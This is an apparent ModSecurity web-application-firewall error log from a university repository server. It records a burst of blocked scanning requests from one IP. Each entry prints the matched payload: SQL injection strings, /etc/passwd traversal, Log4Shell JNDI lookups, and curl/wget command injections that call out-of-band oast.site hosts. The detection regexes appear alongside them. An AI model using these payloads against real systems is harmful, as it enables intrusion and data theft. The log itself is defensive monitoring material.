[Tue Aug 29 11:30:55.365269 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\\\/Windows\\\\/win.ini')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: [#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type  found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c\\x5c/Windows\\x5c\\x5c/win.ini')]: name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c/Windows\\x5c/win.ini')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/account"] [unique_id "ZO10f8Co-f0AAAP05HAAAAAA"]
[Tue Aug 29 11:30:56.340170 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/showfile.php"] [unique_id "ZO10gMCo-f0AAAOKNswAAAAK"]
[Tue Aug 29 11:30:56.364018 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/hms/user-login.php"] [unique_id "ZO10gMCo-f0AAAPOhcgAAAAa"]
[Tue Aug 29 11:30:56.376638 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.fun/ found within TX:1: oast.fun/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/getFavicon"] [unique_id "ZO10gMCo-f0AAAN@5BQAAAAO"]
[Tue Aug 29 11:30:58.311072 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:price_max. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:price_max: 1.0 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)''"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/upload/mobile/index.php"] [unique_id "ZO10gsCo-f0AAAN@5BsAAAAO"]
[Tue Aug 29 11:30:59.316064 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:password: password$(curl cjmn8l5jmimk2adbbnlgxsjub1fmw3fon.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/forms/doLogin"] [unique_id "ZO10g8Co-f0AAAN@5CMAAAAO"]
[Tue Aug 29 11:30:59.408658 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22; ?> found within ARGS:content: <?php echo \\x222UdxkGgdPPx7K5xqPocLkjZLXv2\\x22; ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/file-manager/backend/text"] [unique_id "ZO10g8Co-f0AAAOM4cAAAAAU"]
[Tue Aug 29 11:30:59.420731 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: *\\x22;/ found within ARGS:type: *\\x22;/root/kerbynet.cgi/scripts/getkey ../../../etc/passwd;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10g8Co-f0AAAP05IcAAAAA"]
[Tue Aug 29 11:31:01.469002 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:post_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:post_ids: 0) union select md5(999999999),null,null -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO10hcCo-f0AAAOKNuQAAAAK"]
[Tue Aug 29 11:31:03.574664 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:Event. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:Event: `curl http:/cjmn8l5jmimk2adbbnlgaotzahzj9xpb9.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/include/makecvs.php"] [unique_id "ZO10h8Co-f0AAAP4H9AAAAAI"]
[Tue Aug 29 11:31:04.708051 2023] [:error] [pid 1025] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlg7fzmpwimjqr78.oast.site#.salesforce.com/ found within TX:1: cjmn8l5jmimk2adbbnlg7fzmpwimjqr78.oast.site#.salesforce.com/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/service/error/sfdc_preauth.jsp"] [unique_id "ZO10iMCo-f0AAAQBUFUAAAAj"]
[Tue Aug 29 11:31:04.724906 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:path: `curl http:/cjmn8l5jmimk2adbbnlgyksob63xu97mg.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/tos/index.php"] [unique_id "ZO10iMCo-f0AAAP9HfYAAAAW"]
[Tue Aug 29 11:31:05.003508 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:user_login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:user_login: ' AND (SELECT 8149 FROM (SELECT(SLEEP(3)))NuqO) AND 'YvuB'='YvuB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-json/pie/v1/login"] [unique_id "ZO10icCo-f0AAAP@MvsAAAAZ"]
[Tue Aug 29 11:31:05.731811 2023] [:error] [pid 1023] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:user: a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null..."] [severity " [hostname "repository.unla.ac.id"] [uri "/api.php"] [unique_id "ZO10icCo-f0AAAP-LNEAAAAe"]
[Tue Aug 29 11:31:06.330662 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../../../../../../../../ found within ARGS:controller: ./../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10isCo-f0AAAP7dYMAAAAR"]
[Tue Aug 29 11:31:06.392599 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/sysShell"] [unique_id "ZO10isCo-f0AAAP4H@YAAAAI"]
[Tue Aug 29 11:31:07.372303 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:handle: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cjmn8l5jmimk2adbbnlgwznbr9ufrw1mg.oast.site')"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO10i8Co-f0AAAP@MwgAAAAZ"]
[Tue Aug 29 11:31:08.312679 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../..////////// found within ARGS:lang: /../../../..//////////dev/cmdb/sslvpn_websession"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/remote/fgt_lang"] [unique_id "ZO10jMCo-f0AAAP5mGkAAAAM"]
[Tue Aug 29 11:31:09.096198 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:timezone: 1;wget http:/cjmn8l5jmimk2adbbnlg5qqpopeyfhock.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/upload"] [unique_id "ZO10jcCo-f0AAAQFcPoAAAAn"]
[Tue Aug 29 11:31:10.327492 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:dir: 'Pa_Noteexpr curl+cjmn8l5jmimk2adbbnlgdqoe51gh7wpus.oast.sitePa_Note'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/file_transfer.cgi"] [unique_id "ZO10jsCo-f0AAAP4H@4AAAAI"]
[Tue Aug 29 11:31:10.336032 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:param: action=sql sql='select md5(999999999)'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10jsCo-f0AAAQFcP0AAAAn"]
[Tue Aug 29 11:31:10.387399 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/pages/systemcall.php"] [unique_id "ZO10jsCo-f0AAAQMrosAAAAu"]
[Tue Aug 29 11:31:11.322616 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nodeId[nodeid]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',@@ found within ARGS:nodeId[nodeid]: 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version),19,20,21,22,23,24,25,26,27-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/ajax/api/content_infraction/getIndexableContent"] [unique_id "ZO10j8Co-f0AAAOM4dEAAAAU"]
[Tue Aug 29 11:31:11.988273 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgd7s84et8671bq.oast.site;`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10j8Co-f0AAAP05JwAAAAA"]
[Tue Aug 29 11:31:13.309227 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{"params":"w. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22| found within ARGS:{\\x22params\\x22:\\x22w: 123\\x5c\\x22'1234123'\\x5c\\x22|cat /etc/passwd\\x22}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/api/edr/sangforinter/v2/cssp/slog_client"] [unique_id "ZO10kcCo-f0AAAQP65AAAAAx"]
[Tue Aug 29 11:31:13.312941 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-831}${:-468}.${hostName}.username.cjmn8l5jmimk2adbbnlg5hhox6u59gjfi.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/ccmadmin/j_security_check"] [unique_id "ZO10kcCo-f0AAAO88AcAAAAF"]
[Tue Aug 29 11:31:14.323546 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()))))-- - found within ARGS:id: 1' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x207c20,md5(999999999),1,user()))))-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO10ksCo-f0AAAQFcQUAAAAn"]
[Tue Aug 29 11:31:14.526244 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://0.0.0.0 found within ARGS:url: http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/premise/front/getPingData"] [unique_id "ZO10ksCo-f0AAAQFcQcAAAAn"]
[Tue Aug 29 11:31:15.360160 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:question_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:question_id: 1 AND (SELECT 7242 FROM (SELECT(SLEEP(4)))HQYx)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10k8Co-f0AAAPPS1gAAAAd"]
[Tue Aug 29 11:31:15.361628 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../ found within ARGS:path: /../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php/admin/filemanager/sa/getZipFile"] [unique_id "ZO10k8Co-f0AAAP4H-YAAAAI"]
[Tue Aug 29 11:31:16.646844 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:del. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:del: 123456 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/cms_channel.php"] [unique_id "ZO10lMCo-f0AAAQP65kAAAAx"]
